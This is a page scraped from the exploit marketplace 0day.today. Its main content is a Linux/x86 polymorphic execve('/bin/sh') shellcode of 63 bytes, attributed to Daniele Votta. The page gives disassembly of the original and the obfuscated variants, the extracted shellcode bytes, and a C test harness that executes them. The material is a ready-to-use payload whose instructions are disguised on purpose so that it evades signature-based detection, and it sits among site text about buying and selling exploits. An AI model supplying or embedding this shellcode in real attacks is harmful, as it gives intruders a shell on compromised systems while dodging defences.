0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
/* ; Date: 09/03/2019 ; Polymorphic_Execve_Sh_Stack.asm ; Author: Daniele Votta ; Description: This program invoke a Polimorphic version of excve. Original Execve_Sh_Stack: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor eax,eax 8048082: 50 push eax 8048083: 68 2f 2f 73 68 push 0x68732f2f 8048088: 68 2f 62 69 6e push 0x6e69622f 804808d: 89 e3 mov ebx,esp 804808f: 50 push eax 8048090: 89 e2 mov edx,esp 8048092: 53 push ebx 8048093: 89 e1 mov ecx,esp 8048095: b0 0b mov al,0xb 8048097: cd 80 int 0x80 [+] Extract Shellcode ... "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" Shellcode Length:25 ======================= POC Daniele Votta ======================= Polimorphic_Execve_Sh_Stack: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c3 xor ebx,eax 8048082: 31 d8 xor eax,ebx 8048084: 89 c1 mov ecx,eax 8048086: 51 push ecx 8048087: bf 40 40 84 79 mov edi,0x79844040 804808c: 81 ef 11 11 11 11 sub edi,0x11111111 8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi 8048096: bf 2f 62 69 6e mov edi,0x6e69622f 804809b: 81 c7 11 11 11 11 add edi,0x11111111 80480a1: 81 ef 11 11 11 11 sub edi,0x11111111 80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi 80480ab: 83 ec 04 sub esp,0x4 80480ae: 83 ec 04 sub esp,0x4 80480b1: 89 e3 mov ebx,esp 80480b3: 50 push eax 80480b4: 89 e2 mov edx,esp 80480b6: 53 push ebx 80480b7: 89 e1 mov ecx,esp 80480b9: b0 01 mov al,0x1 80480bb: 04 0a add al,0xa 80480bd: cd 80 int 0x80 [+] Extract Shellcode ... "\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80" Shellcode Length:63 ======================= POC Daniele Votta ======================= */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } # 0day.today [2024-12-25] #